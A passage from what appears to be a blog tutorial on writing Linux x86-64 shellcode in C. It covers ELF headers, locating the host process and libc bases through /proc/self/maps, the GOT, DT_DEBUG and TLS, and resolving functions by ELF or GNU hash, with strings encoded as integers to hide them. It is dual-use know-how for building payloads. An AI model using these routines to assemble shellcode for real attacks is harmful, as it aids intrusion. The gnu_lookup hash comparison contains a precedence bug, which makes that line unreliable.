those for Linux.

For additional reading material, I would recommend reading Cheating the ELF – Subversive Dynamic Linking to Libraries by the grugq and the book Linux Binary Analysis by Ryan “elfmaster” O’Neill. There’s a lot of free reading material online that you can find with any good search engine. A PoC can be found here. The following screenshot shows the shellcode connected to the TCP/IP tool ncat that comes bundled with nmap.

ncat

2. History

The following table ordered in chronological order, highlights some examples of those using C to implement shellcode. There are probably many more than what I’ve listed. Feel free to email me the details of anyone else and I’ll update accordingly.

August 1999 Sebastian “stealth” Krahmer from Team TESO publishes Hellkit 1.1, a tool that converts C code into shellcode for Linux.
July 2003 Inspired by Hellkit, the author of scapy, Philippe Biondi publishes shellforge that uses a combination of C header files and Python to convert a C source code into a shellcode for Linux.
September 2003 Dave Aitel from ImmunitySec publishes MOSDEF, a C-like compiler that generates shellcode for Windows and Linux.
September 2006 Benjamin Caillat publishes WiShMaster, a tool that generates shellcode for Windows from a C source code.
May 2010 Didier Stevens publishes article on writing shellcode for Windows using C.
July 2010 Nick Harbour publishes article on writing shellcode for Windows using C.
November 2011 Radare publish ragg-cc, a shellcode compiler based on gcc and sflib (shellforge).
August 2013 Matt Graeber publishes article on writing shellcode for Windows using C.
November 2013 Shellforge G4 published. It’s a fork of shellforge now maintained by Albert Sellarès.
May 2014 humeafo publishes a shellcode compiler for windows that uses llvm/clang.
December 2015 Binary Ninja publish a shellcode compiler for Windows and Linux. Target architectures include x86, x64, arm, armeb, aarch64, mips, mipsel, ppc, ppcel.
May 2016 Jack Ullrich publishes article on writing shellcode for Windows using C.
May 2016 Phrack publish issue #69 with article by Justin “fishstiqz” Fisher that describes using gcc-mingw to generate windows shellcode in C.
June 2016 Guillaume Delugré publishes Shell-Factory, a tool that uses C++ to generate shellcode for Linux.
August 2016 Ixty publishes shellcode generator that derives a cross-platform shellcode for Linux targetting x86, amd64, aarch32 and aarch64.
November 2016 Ionut Popescu publishes a shellcode compiler for Windows.
Jan 2018 SheLLVM publishes a shellcode compiler for Windows.

3. Definitions

A brief description of some abbreviations used in this post are provided to those unfamiliar with what they mean.

3.1 Position-independent code (PIC)

When a PIC is executed, it should successfully run regardless of where it resides in memory which is compulsory for any shellcode. Unless a target binary is statically linked, dependencies should always be resolved dynamically.

3.2 Position-independent executables (PIE)

Executable binaries made entirely from PIC are mandatory by some systems lacking a Memory Management Unit. However, it’s also used by Address Space Layout Randomization to increase the difficulty of exploiting vulnerabilities. The version of Debian I’m working with has a build of GCC that enables PIE generated binaries by default.

3.3 Thread Local Storage / Transport Layer Security (TLS)

TLS is synonymous with the protocol that protects the vast majority of online communications, but it can also refer to a local area of memory containing global variables that are only accessible to a single thread.

3.4 Address Space Layout Randomization (ASLR)

ASLR is a technique invented by The PaX Team and published in July 2001. It is intended to mitigate against the exploitation of vulnerabilities by randomizing the memory addresses of a process, including the base of the executable, the stack, the heap and libraries. ASLR is not used for statically linked binaries.

3.5 Executable and Link Format

The original specification for the Executable and Link Format (ELF) published in May 1995 by the Linux Foundation. Before attempting to locate the base address of the GNU C Library and any of its exported functions, it’s important to familiarize yourself with the structure of an ELF binary.

4. Base of Host Process

There are three ways to obtain the base address of the host process, or two depending on where the shellcode resides in memory. For shellcode running inside an executable segment, simply read the value of the instruction pointer/program counter and then repeatedly subtract the value of PAGE_SIZE (usually 4096 bytes) from that (aligned) pointer until a valid ELF header is found. If the shellcode is running from executable memory allocated by the mmap function, we can try reading the address from /proc/self/maps using system calls or somehow obtain an arbitrary address from the stack or heap. You can also try reading the base address of libc.so from the Thread Local Storage (TLS) and obtain the link_map structure that contains the base address. I discuss this last approach in section 6.4 when finding the base of libc.so

4.1 Arbitrary Code Address

The get_rip() function with AMD64 assembly inlined simply loads the current value of the Instruction Pointer (IP) into the RAX register before returning. The get_base function will then compare the first 32-bits or 4-bytes of address with what is normally found at the start of an ELF binary. The search continues by subtracting PAGE_SIZE or 4096 bytes until it either finds the base address or crashes. There are of course ways to avoid crashing using system calls.

void* get_rip(void) {
    void* ret;

    __asm__ __volatile__ (
      "lea (%%rip), %%rax\n"
      ".globl get_rip_label	\n"
      "get_rip_label:		    \n"
      "mov %%rax, %0" : "=r"(ret));

    return ret;
}

void *get_base(void* addr) {
    uint64_t base = (uint64_t)addr;
    
    // align down
    base &= -4096;
    
    // equal to ELF?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

4.2 Process File System

/proc/self/maps contains a list of memory addresses, the permissions and the path of module mapped into that memory space. The first address found should belong to the host process. The following code will read the first address, convert the string to binary and return. The system calls are using inline assembly that might look suspicious.

uint64_t hex2bin(const char hex[]) {
    uint64_t r=0;
    char     c;
    int      i;
    
    for(i=0; i<16; i++) {
      c = hex[i];
      if(c >= '0' && c <= '9') { 
        c = c - '0';
      } else if(c >= 'a' && c <= 'f') {
        c = c - 'a' + 10;
      } else if(c >= 'A' && c <= 'F') {
        c = c - 'A' + 10;
      } else break;
      r *= 16;
      r += c;
    }
    return r;
}

void *get_base(void) {
    int  maps;
    void *addr;
    char line[32];
    int  str[8];
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    maps = _open((char*)str, O_RDONLY, 0);
    if(!maps) return NULL;
    
    _read(maps, line, 16);
    _close(maps);
    
    addr = (void*)hex2bin(line);
    return addr;
}

If the system has patches by Grsecurity installed and GRKERNSEC_PROC_MEMMAP is enabled, this code will not work because the option removes addresses from /proc/[pid]/[smaps|maps|stat].

5. ELF Layout

Parsing ELF files in memory is required if you want to find the address of functions. I will only discuss what’s necessary to locate the symbol, string and hash tables.

5.1 File Header

The most important header of all. Every valid ELF executable and shared object should begin with this file header. The binary is interpreted using the following structure.

typedef struct {
  unsigned char e_ident[EI_NIDENT]; /* File identification.              */
  Elf64_Half  e_type;               /* File type.                        */
  Elf64_Half  e_machine;            /* Machine architecture.             */
  Elf64_Word  e_version;            /* ELF format version.               */
  Elf64_Addr  e_entry;              /* Entry point.                      */
  Elf64_Off   e_phoff;              /* Program header file offset.       */
  Elf64_Off   e_shoff;              /* Section header file offset.       */
  Elf64_Word  e_flags;              /* Architecture-specific flags.      */
  Elf64_Half  e_ehsize;             /* Size of ELF header in bytes.      */
  Elf64_Half  e_phentsize;          /* Size of program header entry.     */
  Elf64_Half  e_phnum;              /* Number of program header entries. */
  Elf64_Half  e_shentsize;          /* Size of section header entry.     */
  Elf64_Half  e_shnum;              /* Number of section header entries. */
  Elf64_Half  e_shstrndx;           /* Section name strings section.     */
} Elf64_Ehdr;

The only fields we need to concern ourselves with for the shellcode are e_ident, e_phoff, e_phnum, e_shoff and e_shnum. The following shows the header for /bin/ls using: readelf -h /bin/ls

  ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x5430
  Start of program headers:          64 (bytes into file)
  Start of section headers:          128816 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         30
  Section header string table index: 29

5.2. Program Header

To resolve the address of functions, we only need to work with PT_DYNAMIC and PT_LOAD types. PT_LOAD indicates a loadable program segment such as code (.text) or data (.data). An ELF binary should always have at least one PT_LOAD header, but if PT_DYNAMIC is missing, this indicates the binary has been linked statically and requires resolving functions via the section headers read from disk. Of course, you can always use hardcoded addresses.

typedef struct {
  Elf64_Word  p_type;               /* Entry type.                       */
  Elf64_Word  p_flags;              /* Access permission flags.          */
  Elf64_Off   p_offset;             /* File offset of contents.          */
  Elf64_Addr  p_vaddr;              /* Virtual address in memory image.  */
  Elf64_Addr  p_paddr;              /* Physical address (not used).      */
  Elf64_Xword p_filesz;             /* Size of contents in file.         */
  Elf64_Xword p_memsz;              /* Size of contents in memory.       */
  Elf64_Xword p_align;              /* Alignment in memory and file.     */
} Elf64_Phdr;

Example of dumping program headers for /bin/ls using: readelf -l /bin/ls

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x00000000000001f8 0x00000000000001f8  R E    0x8
  INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x000000000001e184 0x000000000001e184  R E    0x200000
  LOAD           0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000001260 0x0000000000002440  RW     0x200000
  DYNAMIC        0x000000000001edb8 0x000000000021edb8 0x000000000021edb8
                 0x00000000000001f0 0x00000000000001f0  RW     0x8
  NOTE           0x0000000000000254 0x0000000000000254 0x0000000000000254
                 0x0000000000000044 0x0000000000000044  R      0x4
  GNU_EH_FRAME   0x000000000001ab74 0x000000000001ab74 0x000000000001ab74
                 0x000000000000082c 0x000000000000082c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000000c78 0x0000000000000c78  R      0x1

The LOAD header with Offset FileSiz 0x1e184 is the .text segment. We know this because the flags have Read(R) and Execute(E). The other LOAD header has Read(R) and Write(W) flags, and indicates the .data segment. The only time you will see all three together (RWE) is in the OMAGIC format or a potentially malicious binary, of course. The following code when provided the base address of an ELF will return the first program header of type, or zero if one can’t be found.

// return pointer to program header
Elf64_Phdr *elf_get_phdr(void *base, int type) {
    int        i;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    
    // sanity check on base and type
    if(base == NULL || type == PT_NULL) return NULL;
    
    // ensure this some semblance of ELF header
    if(*(uint32_t*)base != 0x464c457fUL) return NULL;
    
    // ok get offset to the program headers
    ehdr=(Elf64_Ehdr*)base;
    phdr=(Elf64_Phdr*)(base + ehdr->e_phoff);
    
    // search through list to find requested type
    for(i=0; i<ehdr->e_phnum; i++) {
      // if found
      if(phdr[i].p_type == type) {
        // return pointer to it
        return &phdr[i];
      }
    }
    // return NULL if not found
    return NULL;
}

5.3 Section Headers

There are at least two ways to calculate the number of entries in the symbol table. The first is by dividing Elf64_Shdr.sh_size for SHT_SYMTAB or SHT_DYNSYM by sizeof(Elf64_Sym) or DT_SYMENT from the dynamic section. The other way is using the nchain value from DT_HASH structure. The problem is that DT_HASH is not always available. In its place will be DT_GNU_HASH that does not indicate how many entries are in the symbol table. For the shellcode, I use a method that works for both static and dynamically linked binaries, but it requires opening the file on disk and mapping into memory.

typedef struct {
       Elf64_Word      sh_name;       /* index to name of section in string table */
       Elf64_Word      sh_type;       /* type of section                          */
       Elf64_Xword     sh_flags;      /* section flags                            */
       Elf64_Addr      sh_addr;       /* memory address of section                */
       Elf64_Off       sh_offset;     /* file offset for section                  */
       Elf64_Xword     sh_size;       /* size of section                          */
       Elf64_Word      sh_link;       /* index to associated                      */
       Elf64_Word      sh_info;       /* extra info about section                 */
       Elf64_Xword     sh_addralign;  /* aligned address                          */
       Elf64_Xword     sh_entsize;    /* size of entry if section is a table      */
} Elf64_Shdr;

The only fields required here are sh_type, sh_offset, sh_size and sh_link. An example of processing the symbol table via section headers is in get_proc_address3.

5.4 Dynamic Structure

The .dynamic section or table contains a list of dynamic entries each of which can be interepreted using the following structure.

typedef struct {
  Elf64_Sxword  d_tag;              /* Entry type.    */
  union {
    Elf64_Xword d_val;              /* Integer value. */
    Elf64_Addr  d_ptr;              /* Address value. */
  } d_un;
} Elf64_Dyn;

The following d_tag values can be used to find specific types. A d_tag value of DT_NULL indicates where the section/table ends.

Type Description Value d_un
DT_PLTGOT Pointer to the Procedure Linkage Table / Global Offset Table 3 d_ptr
DT_HASH ELF hash used to locate symbol. 4 d_ptr
DT_GNU_HASH GNU style hash used to locate symbol. 0x6ffffef5 d_ptr
DT_STRTAB Pointer to the string table. 5 d_ptr
DT_SYMTAB Pointer to the symbol table 6 d_ptr
DT_SYMENT The size of a symbol entry 11 d_val
DT_SONAME Index in string table to the Shared Object name 14 d_val
DT_DEBUG Pointer to an r_debug structure containing the link_map 21 d_ptr
Dynamic section at offset 0x1edb8 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libselinux.so.1]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000c (INIT)               0x34c8
 0x000000000000000d (FINI)               0x15c4c
 0x0000000000000019 (INIT_ARRAY)         0x21e388
 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
 0x000000000000001a (FINI_ARRAY)         0x21e390
 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
 0x000000006ffffef5 (GNU_HASH)           0x298
 0x0000000000000005 (STRTAB)             0x1010
 0x0000000000000006 (SYMTAB)             0x350
 0x000000000000000a (STRSZ)              1501 (bytes)
 0x000000000000000b (SYMENT)             24 (bytes)
 0x0000000000000015 (DEBUG)              0x0
 0x0000000000000003 (PLTGOT)             0x21f000
 0x0000000000000002 (PLTRELSZ)           2544 (bytes)
 0x0000000000000014 (PLTREL)             RELA
 0x0000000000000017 (JMPREL)             0x2ad8
 0x0000000000000007 (RELA)               0x1770
 0x0000000000000008 (RELASZ)             4968 (bytes)
 0x0000000000000009 (RELAENT)            24 (bytes)
 0x000000006ffffffb (FLAGS_1)            Flags: PIE
 0x000000006ffffffe (VERNEED)            0x1700
 0x000000006fffffff (VERNEEDNUM)         1
 0x000000006ffffff0 (VERSYM)             0x15ee
 0x000000006ffffff9 (RELACOUNT)          192
 0x0000000000000000 (NULL)               0x0

Take a look at the following .dynamic section for libc.so and notice the type of SONAME which is “shared object name”. To read this, add Elf64_Dyn.d_un.d_val for DT_SONAME to the Elf64_Dyn.d_un.d_ptr for DT_STRTAB and it will give you a pointer to the string “libc.so.6”

Dynamic section at offset 0x198ba0 contains 26 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]
 0x000000000000000e (SONAME)             Library soname: [libc.so.6]
 .....

The following code is used to locate a dynamic type.

uint64_t elf_get_delta(void *base) {
    Elf64_Phdr *phdr;
    uint64_t   low;
    
    // get pointer to PT_LOAD header
    // first should be executable
    phdr = elf_get_phdr(base, PT_LOAD);
    
    if(phdr != NULL) {
      low = phdr->p_vaddr;
    }
    return (uint64_t)base - low;
}

// return pointer to first dynamic type found
Elf64_Dyn *elf_get_dyn(void *base, int tag) {
    Elf64_Phdr *dynamic;
    Elf64_Dyn  *entry;
    
    // 1. obtain pointer to DYNAMIC program header
    dynamic = elf_get_phdr(base, PT_DYNAMIC);

    if(dynamic != NULL) {
      entry = (Elf64_Dyn*)(dynamic->p_vaddr + elf_get_delta(base));
      // 2. obtain pointer to type
      while(entry->d_tag != DT_NULL) {
        if(entry->d_tag == tag) {
          return entry;
        }
        entry++;
      }
    }
    return NULL;
}

5.5 Symbol Structure

If a binary is being read from disk, the section headers can be used to calculate the location of the symbol table and how many entries it has. The symbol and table entries can be identified by checking the sh_type field of each section header for SHT_SYMTAB or SHT_DYNSYM. You may be asking yourself, what’s the difference?. Typically, object files will contain a .symtab section for the linker, but no .dynsym section. ELF binaries that are dynamically linked will contain a .dynsym section, but no .symtab section. However, if the application is statically linked, the binary will only contain a .symtab section. In practice, you should check for both simultaneously in the event that only one exists.

If a binary is being read from memory that was already mapped by the ELF dynamic linker/loader, the section headers won’t be available and there’s only the dynamic program header (PT_DYNAMIC) to work with. DT_STRTAB, DT_SYMTAB, DT_HASH or DT_GNU_HASH are required for locating the address of functions using the .dynamic section. get_proc_address demonstrates how to lookup by ELF or GNU hash.

typedef struct {
  Elf64_Word    st_name;            /* String table index of name.   */
  unsigned char st_info;            /* Type and binding information. */
  unsigned char st_other;           /* Reserved (not used).          */
  Elf64_Half    st_shndx;           /* Section index of symbol.      */
  Elf64_Addr    st_value;           /* Symbol value.                 */
  Elf64_Xword   st_size;            /* Size of associated object.    */
} Elf64_Sym;
Symbol table '.dynsym' contains 136 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __snprintf_chk@GLIBC_2.3.4 (4)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)

6. Base of C Library

Although I describe obtaining the base address of the host process in section 4, it’s only necessary to obtain the base address of libc.so. We will now examine a number of ways to do this.

6.1 Process Maps File (procfs)

A popular method is by parsing /proc/[pid]/maps where [pid] is the target process id. Using “self” in place of [pid] will query the current process space.

int read_line(int fd, char *buf, int buflen) {
    int  len;
    
    if(buflen==0) return 0;
    
    for(len=0; len < (buflen - 1); len++) {
      // read a byte. exit on error
      if(!_read(fd, &buf[len], 1)) break;
      // exit loop when new line found
      if(buf[len] == '\n') {
        buf[len] = 0;
        break;
      }
    }
    return len;
}

int is_exec(char line[]) {
    char *s = line;
    
    // find the first space
    // but ensure we don't skip newline or null terminator
    while(*s && *s != '\n' && *s != ' ') s++;
    
    // space?
    if(*s == ' ') {
      do {
        s++; // skip 1
        // execute flag?
        if(*s == 'x') return 1;
      // until we reach null terminator, newline or space
      } while (*s && *s != '\n' && *s != ' ');
    }
    return 0;
}

void *get_module_handle1(const char *module) {
    int  maps;
    void *base=NULL, *start_addr;
    char line[PATH_MAX];
    int  str[8], len;
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    // 1. open /proc/self/maps
    maps = _open((char*)str, O_RDONLY, 0);
    if(!maps) return NULL;
    
    // 2. until EOF or module found
    for(;;) {
      // 3. read a line
      len = read_line(maps, line, BUFSIZ);
      if(len == 0) break;
      // 4. remove last character
      line[len] = 0;
      // if permissions disallow execution, skip it
      if(!is_exec(line)) {
        continue;
      }
      start_addr = (void*)hex2bin(line);
      // 5. first address should be the base of host process
      // if no module is requested, return this address
      if(module == 0) {
        base = start_addr;
        break;
      }
      // 6. check if module name is in line
      if(_strstr(line, module)) {
        base = start_addr;
        break;
      }
    }
    _close(maps);
    return base;
}

6.2 Global Offset Table (DT_PLTGOT)

In May 2002, the grugq provided an an example of how to locate the link_map structure stored in the GOT that can then be used to resolve the base address of libc.so. In 2007, herm1t shows another way in INT 0x80? No, thank you! that finds it using the address of libc.so functions rather than the link_map. Either way works, but the method shown here is based on the post by the grugq. The following structure defines the link_map. Note, the structure defined in link.h is much more detailed, but this is really all that’s required to obtain the base address of shared objects.

struct link_map {
    ElfW(Addr) l_addr;		/* Difference between the address in the ELF
				   file and the addresses in memory.  */
    char *l_name;		/* Absolute file name object was found in.  */
    ElfW(Dyn) *l_ld;		/* Dynamic section of the shared object.  */
    struct link_map *l_next, *l_prev; /* Chain of loaded objects.  */
};

The link_map can be found in various ways, but the most popular seems to be via dynamic structures of type DT_PLTGOT and DT_DEBUG.

GOT Index Description
0 Relative Virtual Address of .dynamic program header (PT_DYNAMIC)
1 Pointer to link_map structure.
2 Pointer to _dl_runtime_resolve function in dynamic linker/loader

The following function will retrieve the address of GOT, extract a pointer to the link_map structure and search for the requested module based on string. If no module is provided, the first entry in the list (which happens to be host process) is returned. This is similar to how GetModuleHandle works on windows. However, it’s worth noting that because of how shared objects on Linux are named, the module name provided to this function doesn’t need to be exact. A partial name is sufficient, but that makes it more prone to return the wrong entry.

void *get_module_handle2(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    void            *addr=NULL, *base;
    uint64_t        *ptrs;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();
    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain global offset table
      got = elf_get_dyn(base, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}

6.3 Debug Structure (DT_DEBUG)

The link_map is also available via the debug type or DT_DEBUG.

struct r_debug {
    int32_t r_version;          /* version, always one */
    struct link_map * r_map;    /* list of loaded libraries */
    void (*r_brk)(void);        /* marker function address */
    int32_t r_state;            /* zero if the state of r_map is consistent */
    uintptr_t r_ldbase;         /* linker base address (this is where the linker was loaded after relocation) */
};

The following code shows how to resolve using DT_DEBUG. It’s essentially the same as get_module_handle2 that uses DT_PLTGOT. In fact, it might be possible to use the same function for two separate types if we only use 64-bit pointers assuming r_version is aligned by 8 bytes.

void *get_module_handle3(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *dbg;
    void            *addr=NULL, *base;
    struct r_debug  *debug;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();    
    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain global offset table
      dbg = elf_get_dyn(base, DT_DEBUG);
      if(dbg != NULL) {
        debug = (struct r_debug*)dbg->d_un.d_ptr;
        map   = (struct link_map *)debug->r_map;
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}

6.4 Thread Local Storage (TLS)

herm1t writes in Highway to libc that a pointer to TLS memory for glibc can be found in the Thread Control Block (TCB) accessible via the gs register on 32-bit systems or the fs register on 64-bit systems. If you look at the value of fs on a 64-bit system, it appears to be empty. Accessing fs will still return information from the TCB, but at least on my 64-bit system, it did not contain an address for TLS as expected. While the approach described by herm1t didn’t work on this system, there are some interesting addresses at negative offsets. Read A Deep dive into (implicit) Thread Local Storage for more detailed information on TLS.

  fs-8*7  : main_arena                - heap memory
  fs-8*10 : _nl_C_LC_CTYPE_class
  fs-8*11 : _nl_C_LC_CTYPE_toupper
  fs-8*12 : _nl_C_LC_CTYPE_tolower
  fs-8*14 : _res
  fs-8*15 : _nl_global_locale

The following code will use _nl_C_LC_CTYPE_class to locate the base address of libc.so on my own system, but may not work elsewhere without modification.

void *get_base2(void) {
    uint64_t *fs, base;
    
    // retrieve the address of _nl_C_LC_CTYPE_class
    asm ("mov %%fs:0xffffffffffffffb0,%%rax":"=a"(fs));
    
    base = (uint64_t)fs;
    
    // align down
    base &= -4096;
    
    // equal to ELF?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

Another way simply using the pointer to TCB is presented. It uses a brute force approach and works for dynamic and statically linked binaries. Again, this was tested on my system and may require modification. It works by first obtaining a file descriptor to /dev/random and if it can successfully write the contents of address we want to read, we check for the ELF file header.

void *get_base3(void) {
    uint64_t base;
    int      fd, str[4];
    
    asm ("mov %%fs:0,%%rax" : "=a" (base));
    
    // align down
    base &= -4096;
    
    // "/dev/random"
    str[0] = 0x7665642f;
    str[1] = 0x6e61722f;
    str[2] = 0x006d6f64;

    fd = _open((char*)str, O_WRONLY, 0);
    
    for(;;) {
      if(_write(fd, (char*)base, 4) == 4) {
        if (*(uint32_t*)base == 0x464c457fUL) {
          break;
        }
      }
      base -= 4096;
    }
    _close(fd);
    
    return (void*)base;
}

7. Resolving Address of Functions

At this point we should have the base address of host process and the base address of libc. However, even if you only managed to retrieve the base address of libc, that would be sufficient to do everything else.

7.1 ELF Hash Table (DT_HASH)

Instead of repeating information already available, let me refer you to a couple of posts about this.

  1. Hashin’ the elves by herm1t
  2. ELF: symbol lookup via DT_HASH by FLAPENGUIN

The following code is derived from those two posts.

uint32_t elf_hash(const uint8_t *name) {
    uint32_t h = 0, g;
    
    while (*name) {
      h = (h << 4) + *name++;
      g = h & 0xf0000000;
      if (g)
        h ^= g >> 24;
      h &= ~g;
    }
    return h;
}

void *elf_lookup(
  const char *name, 
  uint32_t *hashtab, 
  Elf64_Sym *sym, 
  const char *str) 
{
    uint32_t  idx;
    uint32_t  nbuckets = hashtab[0];
    uint32_t* buckets  = &hashtab[2];
    uint32_t* chains   = &buckets[nbuckets];
    
    for(idx = buckets[elf_hash(name) % nbuckets]; 
        idx != 0; 
        idx = chains[idx]) 
    {
      // does string match for this index?
      if(!_strcmp(name, sym[idx].st_name + str))
        // return address of function
        return (void*)sym[idx].st_value;
    }
    return NULL;
}

7.2 GNU Hash Table (DT_GNU_HASH)

In June 2006, support for the DT_GNU_HASH table was added and this apparently speeds up searches by 50%. The hash function was posted to comp.lang.c all the way back in 1991 by Dan Bernstein. Deroko from ARTeam discusses it here while FLAPENGUIN discusses it here. The following code is derived from the post by FLAPENGUIN.

#define ELFCLASS_BITS 64

uint32_t gnu_hash(const uint8_t *name) {
    uint32_t h = 5381;

    for(; *name; name++) {
      h = (h << 5) + h + *name;
    }
    return h;
}

struct gnu_hash_table {
    uint32_t nbuckets;
    uint32_t symoffset;
    uint32_t bloom_size;
    uint32_t bloom_shift;
    uint64_t bloom[1];
    uint32_t buckets[1];
    uint32_t chain[1];
};

void* gnu_lookup(
    const char* name,          /* symbol to look up */
    const void* hash_tbl,      /* hash table */
    const Elf64_Sym* symtab,   /* symbol table */
    const char* strtab         /* string table */
) {
    struct gnu_hash_table *hashtab = (struct gnu_hash_table*)hash_tbl;
    const uint32_t  namehash    = gnu_hash(name);

    const uint32_t  nbuckets    = hashtab->nbuckets;
    const uint32_t  symoffset   = hashtab->symoffset;
    const uint32_t  bloom_size  = hashtab->bloom_size;
    const uint32_t  bloom_shift = hashtab->bloom_shift;
    
    const uint64_t* bloom       = (void*)&hashtab->bloom;
    const uint32_t* buckets     = (void*)&bloom[bloom_size];
    const uint32_t* chain       = &buckets[nbuckets];

    uint64_t word = bloom[(namehash / ELFCLASS_BITS) % bloom_size];
    uint64_t mask = 0
        | (uint64_t)1 << (namehash % ELFCLASS_BITS)
        | (uint64_t)1 << ((namehash >> bloom_shift) % ELFCLASS_BITS);

    if ((word & mask) != mask) {
        return NULL;
    }

    uint32_t symix = buckets[namehash % nbuckets];
    if (symix < symoffset) {
        return NULL;
    }

    /* Loop through the chain. */
    for (;;) {
        const char* symname = strtab + symtab[symix].st_name;
        const uint32_t hash = chain[symix - symoffset];        
        if (namehash|1 == hash|1 && _strcmp(name, symname) == 0) {
            return (void*)symtab[symix].st_value;
        }
        if(hash & 1) break;
        symix++;
    }
    return 0;
}

7.3 Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)

The following function works similar to GetProcAddress on Windows and dlsym on Linux. Given a base address and name of function, lookup the virtual address of function using the hash table.

void *get_proc_address(void *module, void *name) {
    Elf64_Dyn  *symtab, *strtab, *hash;
    Elf64_Sym  *syms;
    char       *strs;
    void       *addr = NULL;
    
    // 1. obtain pointers to string and symbol tables
    strtab = elf_get_dyn(module, DT_STRTAB);
    symtab = elf_get_dyn(module, DT_SYMTAB);
    
    if(strtab == NULL || symtab == NULL) return NULL;
    
    // 2. load virtual address of string and symbol tables
    strs = (char*)strtab->d_un.d_ptr;
    syms = (Elf64_Sym*)symtab->d_un.d_ptr;
    
    // 3. try obtain the ELF hash table
    hash = elf_get_dyn(module, DT_HASH);
    
    // 4. if we have it, lookup symbol by ELF hash
    if(hash != NULL) {
      addr = elf_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
    } else {
      // if we don't, try obtain the GNU hash table
      hash = elf_get_dyn(module, DT_GNU_HASH);
      if(hash != NULL) {
        addr = gnu_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
      }
    }
    // 5. did we find symbol? add base address and return
    if(addr != NULL) {
      addr = (void*)((uint64_t)module + addr);
    }
    return addr;
}

This approach requires using the hash table, but in the next example, I’ll show a method similar to what’s used in Windows shellcode.

7.4 Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)

Another way to lookup the address of a function that is by using the section headers. get_proc_address2 given the base of a module will obtain the path of library and pass it to get_proc_address3 that will then search the symbol table using a hash of the function name. get_proc_address3 is primarily for statically linked binaries.

// lookup by hash using the base address of module
